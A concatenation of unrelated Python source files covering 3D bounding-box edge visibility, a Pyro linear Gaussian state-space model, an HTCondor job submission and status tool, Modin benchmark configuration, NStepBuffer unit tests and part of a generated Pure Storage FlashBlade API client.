v3d: List[float]
v2d: List[float]
def __init__(self, vector: np.ndarray, calibration: np.ndarray) -> None:
"""Init the vector."""
self.v3d = vector.tolist()
self.v2d = vector_3d_to_2d(vector, calibration)
class Label3d:
"""Generate the 2D edges of a 3D bounding box."""
def __init__(self, vertices: List[np.ndarray]) -> None:
"""Init the vector."""
self.vertices = vertices
@classmethod
def from_box3d(cls, box3d: Box3D) -> Label3d:
"""Get 8 vertex points of a 3D bounding box."""
x, y, z = box3d.location
center = np.array([x, y, z])
height, width, depth = np.array(box3d.dimension)
def rotate(vector: np.ndarray) -> np.ndarray:
if len(box3d.orientation) == 3:
rot_x, rot_y, rot_z = box3d.orientation
rotated = rotate_vector(vector, rot_x, rot_y, rot_z, center)
else:
rot_y = box3d.orientation[1]
rotated = rotate_vector(
vector, 0, rot_y + np.pi / 2, 0, center
)
return rotated
v000 = rotate(center + np.array([-width / 2, -height / 2, -depth / 2]))
v001 = rotate(center + np.array([-width / 2, -height / 2, depth / 2]))
v010 = rotate(center + np.array([-width / 2, height / 2, -depth / 2]))
v011 = rotate(center + np.array([-width / 2, height / 2, depth / 2]))
v100 = rotate(center + np.array([width / 2, -height / 2, -depth / 2]))
v101 = rotate(center + np.array([width / 2, -height / 2, depth / 2]))
v110 = rotate(center + np.array([width / 2, height / 2, -depth / 2]))
v111 = rotate(center + np.array([width / 2, height / 2, depth / 2]))
return cls([v000, v001, v010, v011, v100, v101, v110, v111])
def get_edges_with_visibility(
self, calibration: np.ndarray
) -> Dict[str, List[List[List[float]]]]:
"""Get edges with visibility."""
vertices = [Vertex(v, calibration) for v in self.vertices]
v000, v001, v010, v011, v100, v101, v110, v111 = vertices
edges = {
"FU": [v000, v100],
"FR": [v100, v110],
"FD": [v010, v110],
"FL": [v000, v010],
"MUL": [v000, v001],
"MUR": [v100, v101],
"MDR": [v110, v111],
"MDL": [v010, v011],
"BU": [v001, v101],
"BR": [v101, v111],
"BD": [v011, v111],
"BL": [v001, v011],
}
faces: Dict[str, Dict[str, Union[List[str], List[Vertex]]]] = {
"F": {
"v": [v000, v100, v110, v010],
"e": ["FU", "FR", "FD", "FL"],
},
"B": {
"v": [v101, v001, v011, v111],
"e": ["BU", "BR", "BD", "BL"],
},
"L": {
"v": [v001, v000, v010, v011],
"e": ["FL", "MUL", "BL", "MDL"],
},
"R": {
"v": [v100, v101, v111, v110],
"e": ["FR", "MUR", "BR", "MDR"],
},
"U": {
"v": [v001, v101, v100, v000],
"e": ["FU", "MUR", "BU", "MUL"],
},
"D": {
"v": [v010, v110, v111, v011],
"e": ["FD", "MDR", "BD", "MDL"],
},
}
face_pairs = ["FB", "LR", "UD"]
dashed_edges = {
"FU": True,
"FR": True,
"FD": True,
"FL": True,
"MUL": True,
"MUR": True,
"MDR": True,
"MDL": True,
"BU": True,
"BR": True,
"BD": True,
"BL": True,
}
for pair in face_pairs:
face1: str = pair[0]
face2: str = pair[1]
cw1 = check_clockwise(
[
np.array(v.v2d)
for v in faces[face1]["v"]
if isinstance(v, Vertex)
]
)
cw2 = check_clockwise(
[
np.array(v.v2d)
for v in faces[face2]["v"]
if isinstance(v, Vertex)
]
)
if cw1 != cw2:
vertices1 = np.array(
[v.v3d for v in faces[face1]["v"] if isinstance(v, Vertex)]
)
vertices2 = np.array(
[v.v3d for v in faces[face2]["v"] if isinstance(v, Vertex)]
)
dist1 = np.linalg.norm(np.median(vertices1, axis=0))
dist2 = np.linalg.norm(np.median(vertices2, axis=0))
solid_face = face1 if dist1 < dist2 else face2
for edge in faces[solid_face]["e"]:
assert isinstance(edge, str)
dashed_edges[edge] = False
edges_with_visibility: Dict[str, List[List[List[float]]]] = {
"dashed": [],
"solid": [],
}
for edge in edges:
if dashed_edges[edge]:
edges_with_visibility["dashed"].append(
[v.v2d for v in edges[edge]]
)
else:
edges_with_visibility["solid"].append(
[v.v2d for v in edges[edge]]
)
return edges_with_visibility
|
# Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
import torch
import torch.nn as nn
from torch.distributions import MultivariateNormal, constraints
import pyro.distributions as dist
from pyro.contrib.timeseries.base import TimeSeriesModel
from pyro.nn import PyroParam, pyro_method
from pyro.ops.tensor_utils import repeated_matmul
class GenericLGSSM(TimeSeriesModel):
"""
A generic Linear Gaussian State Space Model parameterized with arbitrary time invariant
transition and observation dynamics. The targets are (implicitly) assumed to be evenly
spaced in time. Training and inference are logarithmic in the length of the time series T.
:param int obs_dim: The dimension of the targets at each time step.
:param int state_dim: The dimension of latent state at each time step.
:param bool learnable_observation_loc: whether the mean of the observation model should be learned or not;
defaults to False.
"""
def __init__(
self,
obs_dim=1,
state_dim=2,
obs_noise_scale_init=None,
learnable_observation_loc=False,
):
self.obs_dim = obs_dim
self.state_dim = state_dim
if obs_noise_scale_init is None:
obs_noise_scale_init = 0.2 * torch.ones(obs_dim)
assert obs_noise_scale_init.shape == (obs_dim,)
super().__init__()
self.obs_noise_scale = PyroParam(
obs_noise_scale_init, constraint=constraints.positive
)
self.trans_noise_scale_sq = PyroParam(
torch.ones(state_dim), constraint=constraints.positive
)
self.trans_matrix = nn.Parameter(
torch.eye(state_dim) + 0.03 * torch.randn(state_dim, state_dim)
)
self.obs_matrix = nn.Parameter(0.3 * torch.randn(state_dim, obs_dim))
self.init_noise_scale_sq = PyroParam(
torch.ones(state_dim), constraint=constraints.positive
)
if learnable_observation_loc:
self.obs_loc = nn.Parameter(torch.zeros(obs_dim))
else:
self.register_buffer("obs_loc", torch.zeros(obs_dim))
def _get_init_dist(self):
loc = self.obs_matrix.new_zeros(self.state_dim)
return MultivariateNormal(loc, self.init_noise_scale_sq.diag_embed())
def _get_obs_dist(self):
return dist.Normal(self.obs_loc, self.obs_noise_scale).to_event(1)
def _get_trans_dist(self):
loc = self.obs_matrix.new_zeros(self.state_dim)
return MultivariateNormal(loc, self.trans_noise_scale_sq.diag_embed())
def get_dist(self, duration=None):
"""
Get the :class:`~pyro.distributions.GaussianHMM` distribution that corresponds to :class:`GenericLGSSM`.
:param int duration: Optional size of the time axis ``event_shape[0]``.
This is required when sampling from homogeneous HMMs whose parameters
are not expanded along the time axis.
"""
return dist.GaussianHMM(
self._get_init_dist(),
self.trans_matrix,
self._get_trans_dist(),
self.obs_matrix,
self._get_obs_dist(),
duration=duration,
)
@pyro_method
def log_prob(self, targets):
"""
:param torch.Tensor targets: A 2-dimensional tensor of real-valued targets
of shape ``(T, obs_dim)``, where ``T`` is the length of the time series and ``obs_dim``
is the dimension of the real-valued ``targets`` at each time step
:returns torch.Tensor: A (scalar) log probability.
"""
assert targets.dim() == 2 and targets.size(-1) == self.obs_dim
return self.get_dist().log_prob(targets)
@torch.no_grad()
def _filter(self, targets):
"""
Return the filtering state for the associated state space model.
"""
assert targets.dim() == 2 and targets.size(-1) == self.obs_dim
return self.get_dist().filter(targets)
@torch.no_grad()
def _forecast(self, N_timesteps, filtering_state, include_observation_noise=True):
"""
Internal helper for forecasting.
"""
N_trans_matrix = repeated_matmul(self.trans_matrix, N_timesteps)
N_trans_obs = torch.matmul(N_trans_matrix, self.obs_matrix)
predicted_mean = torch.matmul(filtering_state.loc, N_trans_obs)
# first compute the contribution from filtering_state.covariance_matrix
predicted_covar1 = torch.matmul(
N_trans_obs.transpose(-1, -2),
torch.matmul(filtering_state.covariance_matrix, N_trans_obs),
) # N O O
# next compute the contribution from process noise that is injected at each timestep.
# (we need to do a cumulative sum to integrate across time)
process_covar = self._get_trans_dist().covariance_matrix
N_trans_obs_shift = torch.cat([self.obs_matrix.unsqueeze(0), N_trans_obs[:-1]])
predicted_covar2 = torch.matmul(
N_trans_obs_shift.transpose(-1, -2),
torch.matmul(process_covar, N_trans_obs_shift),
) # N O O
predicted_covar = predicted_covar1 + torch.cumsum(predicted_covar2, dim=0)
if include_observation_noise:
predicted_covar = (
predicted_covar + self.obs_noise_scale.pow(2.0).diag_embed()
)
return predicted_mean, predicted_covar
@pyro_method
def forecast(self, targets, N_timesteps):
"""
:param torch.Tensor targets: A 2-dimensional tensor of real-valued targets
of shape ``(T, obs_dim)``, where ``T`` is the length of the time series and ``obs_dim``
is the dimension of the real-valued targets at each time step. These
represent the training data that are conditioned on for the purpose of making
forecasts.
:param int N_timesteps: The number of timesteps to forecast into the future from
the final target ``targets[-1]``.
:returns torch.distributions.MultivariateNormal: Returns a predictive MultivariateNormal distribution
with batch shape ``(N_timesteps,)`` and event shape ``(obs_dim,)``
"""
filtering_state = self._filter(targets)
predicted_mean, predicted_covar = self._forecast(N_timesteps, filtering_state)
return torch.distributions.MultivariateNormal(predicted_mean, predicted_covar)
|
import htcondor
import os
import shutil
import subprocess
import sys
from datetime import datetime, timedelta
from pathlib import Path
from .conf import *
from .dagman import DAGMan
# Must be consistent with job status definitions in src/condor_includes/proc.h
JobStatus = [
"NONE",
"IDLE",
"RUNNING",
"REMOVED",
"COMPLETED",
"HELD",
"TRANSFERRING_OUTPUT",
"SUSPENDED",
"JOB_STATUS_MAX"
]
schedd = htcondor.Schedd()
class Job:
"""
A :class:`Job` holds all operations related to HTCondor jobs
"""
@staticmethod
def submit(file, options=None):
# Make sure the specified submit file exists and is readable!
if os.access(file, os.R_OK) is False:
print(f"Error: could not read file {file}")
sys.exit(1)
# If no resource specified, submit job to the local schedd
if "resource" not in options:
with open(file, "r") as submit_file:
submit_data = submit_file.read()
submit_description = htcondor.Submit(submit_data)
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: {error}")
sys.exit(1)
elif options["resource"] == "slurm":
if "runtime" not in options:
print("Error: Slurm resources must specify a --runtime argument")
sys.exit(1)
# Verify that we have Slurm access; if not, run bosco_clutser to create it
try:
subprocess.check_output(["bosco_cluster", "--status", "hpclogin1.chtc.wisc.edu"])
except Exception:
print(f"You need to install support software to access the Slurm cluster. Please run the following command in your terminal:\n\nbosco_cluster --add hpclogin1.chtc.wisc.edu slurm\n")
sys.exit(1)
Path(TMP_DIR).mkdir(parents=True, exist_ok=True)
DAGMan.write_slurm_dag(file, options["runtime"], options["email"])
os.chdir(TMP_DIR) # DAG must be submitted from TMP_DIR
submit_description = htcondor.Submit.from_dag(str(TMP_DIR / "slurm_submit.dag"))
submit_description["+ResourceType"] = "\"Slurm\""
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time. See the job-set syntax for submitting multiple jobs.")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: f{error}")
sys.exit(1)
elif options["resource"] == "ec2":
if "runtime" not in options:
print("Error: EC2 resources must specify a --runtime argument")
sys.exit(1)
Path(TMP_DIR).mkdir(parents=True, exist_ok=True)
DAGMan.write_ec2_dag(file, options["runtime"], options["email"])
os.chdir(TMP_DIR) # DAG must be submitted from TMP_DIR
submit_description = htcondor.Submit.from_dag("ec2_submit.dag")
submit_description["+ResourceType"] = "\"EC2\""
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time. See the job-set syntax for submitting multiple jobs.")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: f{error}")
sys.exit(1)
@staticmethod
def status(id, options=None):
"""
Displays the status of a job
"""
job = None
job_status = "IDLE"
resource_type = "htcondor"
try:
job = schedd.query(
constraint=f"ClusterId == {id}",
projection=["JobStartDate", "JobStatus", "LastVacateTime", "ResourceType"]
)
except IndexError:
print(f"No job found for ID {id}.")
sys.exit(0)
except Exception as err:
print(f"Error looking up job status: {err}")
sys.exit(1)
if len(job) == 0:
print(f"No job found for ID {id}.")
sys.exit(0)
if "ResourceType" in job[0]:
resource_type = job[0]["ResourceType"].lower()
# Now, produce job status based on the resource type
if resource_type == "htcondor":
if JobStatus[job[0]['JobStatus']] == "RUNNING":
job_running_time = datetime.now() - datetime.fromtimestamp(job[0]["JobStartDate"])
print(f"Job is running since {round(job_running_time.seconds/3600)}h{round(job_running_time.seconds/60)}m{(job_running_time.seconds%60)}s")
elif JobStatus[job[0]['JobStatus']] == "HELD":
job_held_time = datetime.now() - datetime.fromtimestamp(job[0]["LastVacateTime"])
print(f"Job is held since {round(job_held_time.seconds/3600)}h{round(job_held_time.seconds/60)}m{(job_held_time.seconds%60)}s")
elif JobStatus[job[0]['JobStatus']] == "COMPLETED":
print("Job has completed")
else:
print(f"Job is {JobStatus[job[0]['JobStatus']]}")
# Jobs running on provisioned Slurm or EC2 resources need to retrieve
# additional information from the provisioning DAGMan log
elif resource_type == "slurm" or resource_type == "ec2":
# Variables specific to jobs running on Slurm clusters
jobs_running = 0
job_started_time = None
provisioner_cluster_id = None
provisioner_job_submitted_time = None
slurm_cluster_id = None
slurm_nodes_requested = None
slurm_runtime = None
dagman_dag, dagman_out, dagman_log = DAGMan.get_files(id)
if dagman_dag is None:
print(f"No {resource_type} job found for ID {id}.")
sys.exit(0)
# Parse the .dag file to retrieve some user input values
with open(dagman_dag, "r") as dagman_dag_file:
for line in dagman_dag_file.readlines():
if "annex_runtime =" in line:
slurm_runtime = int(line.split("=")[1].strip())
# Parse the DAGMan event log for useful information
dagman_events = htcondor.JobEventLog(dagman_log)
for event in dagman_events.events(0):
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: B":
provisioner_cluster_id = event.cluster
provisioner_job_submitted_time = datetime.fromtimestamp(event.timestamp)
job_status = "PROVISIONING REQUEST PENDING"
elif "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: C":
slurm_cluster_id = event.cluster
elif event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
job_status = "RUNNING"
jobs_running += 1
if job_started_time is None:
job_started_time = datetime.fromtimestamp(event.timestamp)
elif event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.JOB_TERMINATED:
jobs_running -= 1
if jobs_running == 0:
job_status = "COMPLETE"
elif event.type == htcondor.JobEventType.JOB_HELD or event.type == htcondor.JobEventType.EXECUTABLE_ERROR:
job_status = "ERROR"
# Calculate how long job has been in its current state
current_time = datetime.now()
time_diff = None
if job_status == "PROVISIONING REQUEST PENDING":
time_diff = current_time - provisioner_job_submitted_time
elif job_status == "RUNNING":
time_diff = current_time - job_started_time
# Now that we have all the information we want, display it
if job_status == "COMPLETED":
print("Job has completed")
else:
if job_status == "PROVISIONING REQUEST PENDING":
print(f"Job is waiting for {resource_type.upper()} to provision pending request", end='')
else:
print(f"Job is {job_status}", end='')
if time_diff is not None:
print(f" since {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
else:
print("")
else:
print(f"Error: The 'job status' command does not support {resource_type} resources.")
sys.exit(1)
@staticmethod
def resources(id, options=None):
"""
Displays the resources used by a specified job
"""
# If no resource specified, assume job is running on local pool
if "resource" not in options:
try:
job = schedd.query(
constraint=f"ClusterId == {id}",
projection=["RemoteHost"]
)
except IndexError:
print(f"No jobs found for ID {id}.")
sys.exit(0)
except:
print(f"Unable to look up job resources")
sys.exit(1)
if len(job) == 0:
print(f"No jobs found for ID {id}.")
sys.exit(0)
# TODO: Make this work correctly for jobs that havne't started running yet
job_host = job[0]["RemoteHost"]
print(f"Job is using resource {job_host}")
# Jobs running on provisioned Slurm resources need to retrieve
# additional information from the provisioning DAGMan log
elif options["resource"] == "slurm":
# Internal variables
dagman_cluster_id = None
provisioner_cluster_id = None
slurm_cluster_id = None
# User-facing variables (all values set below are default/initial state)
provisioner_job_submitted_time = None
provisioner_job_scheduled_end_time = None
job_status = "NOT SUBMITTED"
job_started_time = None
jobs_running = 0
slurm_nodes_requested = None
slurm_runtime = None
dagman_dag, dagman_out, dagman_log = DAGMan.get_files(id)
if dagman_dag is None:
print(f"No Slurm job found for ID {id}.")
sys.exit(0)
# Parse the .dag file to retrieve some user input values
with open(dagman_dag, "r") as dagman_dag_file:
for line in dagman_dag_file.readlines():
if "annex_runtime =" in line:
slurm_runtime = int(line.split("=")[1].strip())
# Parse the DAGMan event log for useful information
dagman_events = htcondor.JobEventLog(dagman_log)
for event in dagman_events.events(0):
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: B":
provisioner_cluster_id = event.cluster
provisioner_job_submitted_time = datetime.fromtimestamp(event.timestamp)
provisioner_job_scheduled_end_time = datetime.fromtimestamp(event.timestamp + slurm_runtime)
job_status = "PROVISIONING REQUEST PENDING"
if event.cluster == provisioner_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
provisioner_job_started_time = datetime.fromtimestamp(event.timestamp)
provisioner_job_scheduled_end_time = datetime.fromtimestamp(event.timestamp + slurm_runtime)
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: C":
slurm_cluster_id = event.cluster
job_started_time = datetime.fromtimestamp(event.timestamp)
if event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
job_status = "RUNNING"
jobs_running += 1
if event.cluster == slurm_cluster_id and (event.type == htcondor.JobEventType.JOB_TERMINATED or event.type == htcondor.JobEventType.JOB_EVICTED):
jobs_running -= 1
if jobs_running == 0:
job_status = "COMPLETE"
if event.type == htcondor.JobEventType.JOB_HELD or event.type == htcondor.JobEventType.EXECUTABLE_ERROR:
job_status = "ERROR"
# Now that we have all the information we want, display it
if job_status == "PROVISIONING REQUEST PENDING":
print(f"Job is still waiting for {slurm_nodes_requested} Slurm nodes to provision")
elif job_status == "RUNNING":
print(f"Job is running on {jobs_running}/{slurm_nodes_requested} requested Slurm nodes")
elif job_status == "ERROR":
print(f"An error occurred provisioning Slurm resources")
# Show information about time remaining
if job_status == "RUNNING" or job_status == "COMPLETE":
current_time = datetime.now()
if current_time < provisioner_job_scheduled_end_time:
time_diff = provisioner_job_scheduled_end_time - current_time
print(f"Slurm resources are reserved for another {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
else:
time_diff = current_time - provisioner_job_scheduled_end_time
print(f"Slurm resources were terminated since {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
|
# Licensed to Modin Development Team under one or more contributor license agreements.
# See the NOTICE file distributed with this work for additional information regarding
# copyright ownership. The Modin Development Team licenses this file to you under the
# Apache License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""Compatibility layer for parameters used by ASV."""
import os
import modin.pandas as pd
try:
from modin.config import NPartitions
NPARTITIONS = NPartitions.get()
except ImportError:
NPARTITIONS = pd.DEFAULT_NPARTITIONS
try:
from modin.config import TestDatasetSize, AsvImplementation, Engine, Backend
ASV_USE_IMPL = AsvImplementation.get()
ASV_DATASET_SIZE = TestDatasetSize.get() or "Small"
ASV_USE_ENGINE = Engine.get()
ASV_USE_BACKEND = Backend.get()
except ImportError:
# The same benchmarking code can be run for different versions of Modin, so in
# case of an error importing important variables, we'll just use predefined values
ASV_USE_IMPL = os.environ.get("MODIN_ASV_USE_IMPL", "modin")
ASV_DATASET_SIZE = os.environ.get("MODIN_TEST_DATASET_SIZE", "Small")
ASV_USE_ENGINE = os.environ.get("MODIN_ENGINE", "Ray")
ASV_USE_BACKEND = os.environ.get("MODIN_BACKEND", "Pandas")
ASV_USE_IMPL = ASV_USE_IMPL.lower()
ASV_DATASET_SIZE = ASV_DATASET_SIZE.lower()
ASV_USE_ENGINE = ASV_USE_ENGINE.lower()
ASV_USE_BACKEND = ASV_USE_BACKEND.lower()
assert ASV_USE_IMPL in ("modin", "pandas")
assert ASV_DATASET_SIZE in ("big", "small")
assert ASV_USE_ENGINE in ("ray", "dask", "python", "native")
assert ASV_USE_BACKEND in ("pandas", "omnisci", "pyarrow")
|
from . import models
from . import controllers
from . import reports
|
import numpy as np
import pytest
from ai_traineree.buffers import Experience, NStepBuffer
def generate_sample_SARS(iterations, obs_space: int=4, action_size: int=2, dict_type=False):
state_fn = lambda: np.random.random(obs_space)
action_fn = lambda: np.random.random(action_size)
reward_fn = lambda: float(np.random.random() - 0.5)
done_fn = lambda: np.random.random() > 0.5
state = state_fn()
for _ in range(iterations):
next_state = state_fn()
if dict_type:
yield dict(
state=list(state), action=list(action_fn()), reward=[reward_fn()], next_state=list(next_state), done=[bool(done_fn())]
)
else:
yield (list(state), list(action_fn()), reward_fn(), list(next_state), bool(done_fn()))
state = next_state
def populate_buffer(buffer, num_samples):
for (state, action, reward, next_state, done) in generate_sample_SARS(num_samples):
buffer.add(state=state, action=action, reward=reward, next_state=next_state, done=done)
return buffer
def test_nstep_buffer_add_sample():
# Assign
buffer = NStepBuffer(2, gamma=1.)
# Act
sars = next(generate_sample_SARS(1, dict_type=True))
buffer.add(**sars)
# Assert
assert len(buffer) == 1
assert list(buffer.data) == [Experience(**sars)]
def test_nstep_buffer_add_many_samples():
# Assign
buffer_size = 4
gamma = 1.
buffer = NStepBuffer(n_steps=buffer_size, gamma=gamma)
populate_buffer(buffer, 20) # in-place
last_samples = [sars for sars in generate_sample_SARS(buffer_size, dict_type=True)]
last_rewards = [s['reward'][0] for s in last_samples]
# Act
for sample in last_samples:
sample['done'] = [False] # Make sure all samples are counted
buffer.add(**sample)
# Assert
assert len(buffer) == buffer_size
for expected_len in range(buffer_size)[::-1]:
sample = buffer.get()
assert len(buffer) == expected_len
assert sample.reward[0] == sum(last_rewards[-expected_len-1:])
def test_nstep_buffer_add_many_samples_discounted():
# Assign
buffer_size = 4
gamma = 0.9
buffer = NStepBuffer(n_steps=buffer_size, gamma=gamma)
populate_buffer(buffer, 20) # in-place
last_samples = [sars for sars in generate_sample_SARS(4, dict_type=True)]
last_rewards = [s['reward'][0] for s in last_samples]
# Act
for sample in last_samples:
sample['done'] = [False] # Make sure all samples are counted
buffer.add(**sample)
# Assert
assert len(buffer) == buffer_size
for expected_len in range(buffer_size)[::-1]:
sample = buffer.get()
discounted_reward = sum([r * gamma**idx for (idx, r) in enumerate(last_rewards[-expected_len-1:])])
assert len(buffer) == expected_len
assert sample.reward[0] == discounted_reward, f"{sample}"
def test_nstep_buffer_add_many_samples_discounted_terminate():
# Assign
buffer_size = 4
gamma = 0.9
buffer = NStepBuffer(n_steps=buffer_size, gamma=gamma)
populate_buffer(buffer, 20) # in-place
last_samples = [sars for sars in generate_sample_SARS(4, dict_type=True)]
expected_rewards = []
for idx, sample in enumerate(last_samples):
expected_rewards.append(sample['reward'][0])
for iidx, sample in enumerate(last_samples[idx+1:]):
if any(sample['done']):
break
expected_rewards[-1] += gamma ** (iidx+1) * sample['reward'][0]
# Act
for sample in last_samples:
buffer.add(**sample)
# Assert
assert len(buffer) == buffer_size
for idx, expected_len in enumerate(range(buffer_size)[::-1]):
sample = buffer.get()
assert len(buffer) == expected_len
assert sample.reward[0] == expected_rewards[idx], f"{sample}"
def test_nstep_buffer_clear():
# Assign
buffer = NStepBuffer(n_steps=5, gamma=1.)
populate_buffer(buffer, 10) # in-place
# Act & assert
assert len(buffer) == 5
buffer.clear()
assert len(buffer) == 0
def test_nstep_buffer_get_state_without_data():
# Assign
buffer = NStepBuffer(n_steps=5, gamma=1.)
# Act
state = buffer.get_state()
# Assert
assert state.type == NStepBuffer.type
assert state.buffer_size == 5
assert state.batch_size == 1
assert state.data is None
def test_nstep_buffer_get_state_with_data():
# Assign
buffer = NStepBuffer(n_steps=5, gamma=1.)
populate_buffer(buffer, 10) # in-place
# Act
state = buffer.get_state()
# Assert
assert state.type == NStepBuffer.type
assert state.buffer_size == 5
assert state.batch_size == 1
assert len(state.data) == state.buffer_size
def test_nstep_buffer_from_state_without_data():
# Assign
buffer_size, gamma = 5, 0.9
buffer = NStepBuffer(n_steps=buffer_size, gamma=gamma)
state = buffer.get_state()
# Act
new_buffer = NStepBuffer.from_state(state)
# Assert
assert new_buffer.type == NStepBuffer.type
assert new_buffer.gamma == gamma
assert new_buffer.buffer_size == state.buffer_size == buffer.n_steps
assert new_buffer.batch_size == state.batch_size == buffer.batch_size == 1
assert len(new_buffer.data) == 0
def test_nstep_buffer_from_state_with_data():
# Assign
buffer_size = 5
buffer = NStepBuffer(n_steps=buffer_size, gamma=1.)
buffer = populate_buffer(buffer, 10) # in-place
last_samples = [sars for sars in generate_sample_SARS(buffer_size, dict_type=True)]
for sample in last_samples:
buffer.add(**sample)
state = buffer.get_state()
# Act
new_buffer = NStepBuffer.from_state(state)
# Assert
assert new_buffer.type == NStepBuffer.type
assert new_buffer.buffer_size == state.buffer_size == buffer.n_steps
assert new_buffer.batch_size == state.batch_size == buffer.batch_size == 1
assert len(new_buffer.data) == state.buffer_size
for sample in last_samples:
assert Experience(**sample) in new_buffer.data
def test_per_from_state_wrong_type():
# Assign
buffer = NStepBuffer(n_steps=5, gamma=1.)
state = buffer.get_state()
state.type = "WrongType"
# Act
with pytest.raises(ValueError):
NStepBuffer.from_state(state=state)
def test_per_from_state_wrong_batch_size():
# Assign
buffer = NStepBuffer(n_steps=5, gamma=1.)
state = buffer.get_state()
state.batch_size = 5
# Act
with pytest.raises(ValueError):
NStepBuffer.from_state(state=state)
|
# coding: utf-8
"""
Pure Storage FlashBlade REST 1.10 Python SDK
Pure Storage FlashBlade REST 1.10 Python SDK. Compatible with REST API versions 1.0 - 1.10. Developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.10
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class FileSystemsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_file_systems(self, file_system, **kwargs):
"""
Create a new file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_file_systems(file_system, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param FileSystem file_system: The attribute map used to create the file system. (required)
:param bool overwrite: Should we overwrites an existing file system? True if so.
:param bool discard_non_snapshotted_data: discard (true) the non-snapshotted data.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_file_systems_with_http_info(file_system, **kwargs)
else:
(data) = self.create_file_systems_with_http_info(file_system, **kwargs)
return data
def create_file_systems_with_http_info(self, file_system, **kwargs):
"""
Create a new file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_file_systems_with_http_info(file_system, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param FileSystem file_system: The attribute map used to create the file system. (required)
:param bool overwrite: Should we overwrites an existing file system? True if so.
:param bool discard_non_snapshotted_data: discard (true) the non-snapshotted data.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_system', 'overwrite', 'discard_non_snapshotted_data']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_file_systems" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'file_system' is set
if ('file_system' not in params) or (params['file_system'] is None):
raise ValueError("Missing the required parameter `file_system` when calling `create_file_systems`")
collection_formats = {}
path_params = {}
query_params = []
if 'overwrite' in params:
query_params.append(('overwrite', params['overwrite']))
if 'discard_non_snapshotted_data' in params:
query_params.append(('discard_non_snapshotted_data', params['discard_non_snapshotted_data']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'file_system' in params:
body_params = params['file_system']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileSystemResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_filesystem_policies(self, **kwargs):
"""
Create a connection between a file system and a policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_filesystem_policies(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
